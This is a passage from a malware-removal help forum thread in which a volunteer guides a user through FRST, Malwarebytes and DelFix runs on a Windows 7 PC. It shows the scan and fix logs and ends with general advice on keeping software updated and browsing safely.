2014-10-19 09:35 - 2014-10-22 07:05 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-19 09:35 - 2014-10-22 07:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-19 09:34 - 2014-10-22 07:05 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-19 09:34 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-10-19 09:34 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-10-16 06:01 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-16 06:01 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll
2014-10-16 06:01 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll
2014-10-16 06:01 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll
2014-10-16 06:00 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-16 06:00 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-16 06:00 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-16 06:00 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-16 06:00 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-16 06:00 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-16 06:00 - 2014-09-18 20:14 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
2014-10-16 06:00 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-10-16 06:00 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-16 06:00 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2014-10-16 06:00 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2014-10-16 06:00 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-16 06:00 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-16 06:00 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-16 06:00 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-10-16 06:00 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-10-16 06:00 - 2014-09-18 19:50 - 00108032 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2014-10-16 06:00 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2014-10-16 06:00 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2014-10-16 06:00 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2014-10-16 06:00 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-16 06:00 - 2014-09-18 19:20 - 00677888 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-16 06:00 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-16 06:00 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2014-10-16 06:00 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-16 06:00 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-16 06:00 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2014-10-16 06:00 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-16 05:59 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-16 05:59 - 2014-08-28 20:44 - 02744320 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll
2014-10-16 05:59 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-10-16 05:59 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-10-16 05:59 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys
2014-10-16 05:59 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys
2014-10-16 05:58 - 2014-08-29 20:50 - 05702656 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-09-30 05:40 - 2014-09-30 05:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 17:44 - 2012-08-25 09:04 - 00001844 _____ () C:\Users\Public\Desktop\McAfee Internet Security.lnk
2014-10-28 17:39 - 2010-05-07 23:24 - 01134306 _____ () C:\windows\PFRO.log
2014-10-28 17:39 - 2010-05-07 22:53 - 01826244 _____ () C:\windows\WindowsUpdate.log
2014-10-28 17:39 - 2009-07-13 23:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-10-28 17:39 - 2009-07-13 23:39 - 00335011 _____ () C:\windows\setupact.log
2014-10-28 17:38 - 2010-08-13 15:58 - 00000000 ____D () C:\Users\Jude
2014-10-28 17:38 - 2000-10-29 17:31 - 00407624 _____ () C:\Users\Jude\Documents\Grandpa Frank's picture.eml
2014-10-28 17:34 - 2009-07-13 23:34 - 00014240 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-28 17:34 - 2009-07-13 23:34 - 00014240 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-27 05:34 - 2014-07-05 15:34 - 328273831 _____ () C:\windows\MEMORY.DMP
2014-10-27 05:34 - 2014-07-05 15:34 - 00000000 ____D () C:\windows\Minidump
2014-10-26 19:30 - 2012-02-12 13:38 - 00000000 ____D () C:\Program Files\LTCM Client
2014-10-23 22:17 - 2010-08-14 11:20 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Skype
2014-10-23 20:13 - 2010-08-13 15:58 - 00000000 ____D () C:\Users\Jude\AppData\Local\VirtualStore
2014-10-22 23:18 - 2013-08-03 08:13 - 00701104 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerApp.exe
2014-10-22 23:18 - 2011-07-30 12:21 - 00071344 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerCPLApp.cpl
2014-10-22 23:17 - 2010-08-29 13:04 - 00000000 ____D () C:\Users\Jude\AppData\Local\Adobe
2014-10-22 23:08 - 2011-07-30 12:19 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-10-22 23:07 - 2010-08-29 13:05 - 00000000 ____D () C:\ProgramData\Adobe
2014-10-20 18:56 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\rescache
2014-10-19 09:35 - 2010-08-29 13:23 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Malwarebytes
2014-10-19 09:34 - 2010-08-29 13:23 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-16 16:07 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\Microsoft.NET
2014-10-16 09:16 - 2009-07-13 23:33 - 00408160 _____ () C:\windows\system32\FNTCACHE.DAT
2014-10-16 09:08 - 2013-08-03 08:26 - 00000000 ____D () C:\windows\system32\MRT
2014-10-16 09:01 - 2010-12-25 17:37 - 100290944 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-06 11:15 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\system32\NDF
2014-10-01 11:11 - 2013-11-30 09:46 - 00023256 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
2014-09-29 07:47 - 2009-07-13 23:53 - 00032632 _____ () C:\windows\Tasks\SCHEDLGU.TXT

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-27 16:32

==================== End Of Log ============================

 

Please review this and let me know if any further action is required.

 

Thank you,

 

John



#10 Gunto

Gunto

    Bleepin' Reject Phoenix


  • Malware Response Team
  • 1,291 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:North Las Vegas, Nevada, USA
  • Local time:06:59 AM

Posted 29 October 2014 - 10:06 AM

Hi,

 

Very good! I still see a few things in your log to take care of, but assuming you're not having any problems, we're getting close to being done!

 

Farbar Recovery Scan Tool

I need you to run a fix with FRST.

  • Open up Notepad, and copy and paste the text in the following box into the Notepad text field:
    HKLM\...\Policies\Explorer: [NoFolderOptions] 0
    HKLM\...\Policies\Explorer: [NoControlPanel] 0
    HKU\S-1-5-18\...\RunOnce: [WLStart] => C:\Program Files\Windows Live\Installer\wlstart.exe [768336 2009-07-26] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
    S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
    C:\windows\system32\2014-10-25-00-14-23.060-AvastVBoxSVC.exe-6096.log
    C:\windows\system32\2014-10-24-03-23-19.088-aswFe.exe-2368.log
    C:\Program Files\Enigma Software Group
    C:\windows\455F074C814E4520B69B5584BD90400C.TMP
    C:\Program Files\Common Files\Wise Installation Wizard
    C:\windows\system32\2014-10-24-02-06-00.040-AvastVBoxSVC.exe-9492.log
    C:\windows\system32\vbox
    C:\ProgramData\AVAST Software
    C:\ProgramData\Sun
    C:\ProgramData\Oracle
    Save it to the same location as FRST as fixlist.txt.
  • Open up FRST, and click the Fix button. If it asks you to reboot in order to complete the fix, please do so.
  • Once it's done fixing things, it will create Fixlog.txt in the same folder. Please copy and paste it into your reply.

Malwarebytes

Next, to make sure there aren't any leftovers hiding, I need you to run a scan with Malwarebytes Anti-Malware.

  • Double click the MBAM shortcut on your desktop to open MBAM.
  • Click Update Now >>, and check for updates. If a new version of MBAM is included in the update, follow the prompts and install it.
  • Once the program is done updating, click Scan at the top of the main interface. Then tick the Custom Scan option, and hit the Scan Now >> button. On this screen, make sure every box is checked, then start the scan. If there is a program update available, allow MBAM to update.
  • Once the scan is finished, click Apply Actions to any found malware. If MBAM asks you to reboot, do so immediately.
  • When done, retrieve the log by clicking History on the main interface, then Application logs. View the log of the scan you just ran, then click the Copy to Clipboard button, and paste it into your reply.

Finally, please let me know how your computer is running.

 

Gunto


Beautiful avatar by Plumbeck!

 

Bury me in honor; when I'm dead and hit the ground, a love back home, it unfolds...


#11 sysadmin74

sysadmin74
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:59 AM

Posted 29 October 2014 - 11:06 AM

Thank you for the update.  I'll run the recommended scans sometime later tonight.  As for my PC's performance, it's been performing much better since Friday.  I no longer see multiple instances of dllhost.exe running and taking up a lot of memory.  Downloads have also been enabled in the security settings of IE and have not had to be re-enabled. 



#12 sysadmin74

sysadmin74
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:59 AM

Posted 29 October 2014 - 09:44 PM

Enclosed are the contents of the fixlog file:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 26-10-2014
Ran by Jude at 2014-10-29 17:52:22 Run:2
Running from C:\Users\Jude\Desktop
Loaded Profile: Jude (Available profiles: Jude)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-18\...\RunOnce: [WLStart] => C:\Program Files\Windows Live\Installer\wlstart.exe [768336 2009-07-26] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
C:\windows\system32\2014-10-25-00-14-23.060-AvastVBoxSVC.exe-6096.log
C:\windows\system32\2014-10-24-03-23-19.088-aswFe.exe-2368.log
C:\Program Files\Enigma Software Group
C:\windows\455F074C814E4520B69B5584BD90400C.TMP
C:\Program Files\Common Files\Wise Installation Wizard
C:\windows\system32\2014-10-24-02-06-00.040-AvastVBoxSVC.exe-9492.log
C:\windows\system32\vbox
C:\ProgramData\AVAST Software
C:\ProgramData\Sun
C:\ProgramData\Oracle
*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFolderOptions => value deleted successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoControlPanel => value deleted successfully.
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\WLStart => value deleted successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => Key deleted successfully.
"HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
esgiguard => Service deleted successfully.
C:\windows\system32\2014-10-25-00-14-23.060-AvastVBoxSVC.exe-6096.log => Moved successfully.
C:\windows\system32\2014-10-24-03-23-19.088-aswFe.exe-2368.log => Moved successfully.
C:\Program Files\Enigma Software Group => Moved successfully.
C:\windows\455F074C814E4520B69B5584BD90400C.TMP => Moved successfully.
C:\Program Files\Common Files\Wise Installation Wizard => Moved successfully.
C:\windows\system32\2014-10-24-02-06-00.040-AvastVBoxSVC.exe-9492.log => Moved successfully.
C:\windows\system32\vbox => Moved successfully.
C:\ProgramData\AVAST Software => Moved successfully.
C:\ProgramData\Sun => Moved successfully.
C:\ProgramData\Oracle => Moved successfully.

==== End of Fixlog ====

 

Enclosed are the contents of the Malwarebytes scan:

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/29/2014
Scan Time: 5:58:27 PM
Logfile:
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.10.29.08
Rootkit Database: v2014.10.22.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x86
File System: NTFS
User: Jude

Scan Type: Custom Scan
Result: Completed
Objects Scanned: 712448
Time Elapsed: 3 hr, 34 min, 51 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

 

Thanks again and please let me know what further steps, if any, are recommended.



#13 Gunto

Gunto

    Bleepin' Reject Phoenix


  • Malware Response Team
  • 1,291 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:North Las Vegas, Nevada, USA
  • Local time:06:59 AM

Posted 30 October 2014 - 10:24 AM

Hi,

 

Excellent! And with that...

 

Congrats, your computer looks free of malware! :woot:

However, we'll need to clean up the tools we used to make it that way.

  • Download DelFix from here, and save it to your desktop.
  • Double click the file to run it. On the main screen, make sure the following options are checked:
    Remove disinfection tools
    Purge system restore

    Click the Run button after ensuring the above options are selected.
  • Once the program is done running, a log will pop up. Please copy and paste it into your final reply.

Here are some steps to improve how your computer works, and to help you from getting infected again.

Keep all of your software updated. This is especially true for your antivirus. Keeping your software up-to-date is one of the most important steps to keeping malware out of your system. Old versions of many different programs have security vulnerabilities that malware targets to infect your system, whereas many of these would be fixed in updates. In addition to that, outdated definitions for your antivirus (and other security programs) may fail to detect newer malware that has since been added to the database. For new software version updates, I recommend FileHippo App Manager. However, FH doesn't find all updates, so be sure to manually check for updates as well.

Browse safely. Much of the time, malware gets in because the user isn't cautious. Examples of safe browsing include:

  • Don't open emails from people you don't know, especially if it has an attachment. Files (especially those with a .BAT, .COM, .EXE and .SCR extension) should never be trusted unless you know for a fact that you can trust the source. You should also be careful with these files even from friends, since their emails might actually be from bots using their addresses.
  • Don't install things that you don't trust. For example, some websites will ask you to install programs in order to use a certain functionality, especially supposed updates to programs such as Flash and Java. If your software is up-to-date, it's probably a fake.
  • In addition to the above, be careful even when installing programs that you recognize. Sometimes, programs will install other software when a user doesn't pay attention, so always make sure to decline offers for programs you don't want or recognize.

Happy surfing! :)

Gunto


Beautiful avatar by Plumbeck!

 

Bury me in honor; when I'm dead and hit the ground, a love back home, it unfolds...


#14 sysadmin74

sysadmin74
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:59 AM

Posted 31 October 2014 - 07:44 PM

Enclosed are the contents of the delfix file:

 

# DelFix v10.8 - Logfile created 31/10/2014 at 19:39:39
# Updated 29/07/2014 by Xplode
# Username : Jude - GERSTNER-PC
# Operating System : Windows 7 Home Premium Service Pack 1 (32 bits)

~ Removing disinfection tools ...

Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\TDSSKiller.3.0.0.40_20.10.2014_19.37.30_log.txt
Deleted : C:\TDSSKiller.3.0.0.40_23.10.2014_20.59.48_log.txt
Deleted : C:\Users\Jude\Desktop\Fixlog.txt
Deleted : C:\Users\Jude\Downloads\RogueKiller.exe
Deleted : HKLM\SOFTWARE\AdwCleaner
Deleted : HKLM\SOFTWARE\Swearware
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys

~ Cleaning system restore ...

Deleted : RP #2630 [Installed SpyHunter | 10/24/2014 03:14:31]
Deleted : RP #2631 [Removed Sophos Virus Removal Tool. | 10/25/2014 00:11:54]
Deleted : RP #2632 [Removed Sophos Virus Removal Tool. | 10/25/2014 00:18:24]
Deleted : RP #2633 [Removed SpyHunter | 10/25/2014 00:34:16]
Deleted : RP #2635 [avast! antivirus system restore point | 10/25/2014 00:42:19]
Deleted : RP #2636 [Removed Java 7 Update 71 | 10/27/2014 00:16:38]

New restore point created !

########## - EOF - ##########
 

Thank you very much for your assistance with this issue.  I greatly appreciate your assistance, and please let me know if anything further is required.  I've made note of your recommendations for updating my installed applications and will start using FileHippo. 

 

Sincerely,

 

John



#15 Gunto

Gunto

    Bleepin' Reject Phoenix


  • Malware Response Team
  • 1,291 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:North Las Vegas, Nevada, USA
  • Local time:06:59 AM

Posted 01 November 2014 - 04:04 PM

Hi,

 

Wonderful, and you're very welcome. I'm happy that I could help. :) Great news, we're done here!

 

Since your problems seem to be solved, I'm locking this topic. However, if you still need help, please send me (or any moderator if I am unavailable) a PM asking for this topic to be unlocked.

 

Gunto


Beautiful avatar by Plumbeck!

 

Bury me in honor; when I'm dead and hit the ground, a love back home, it unfolds...





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users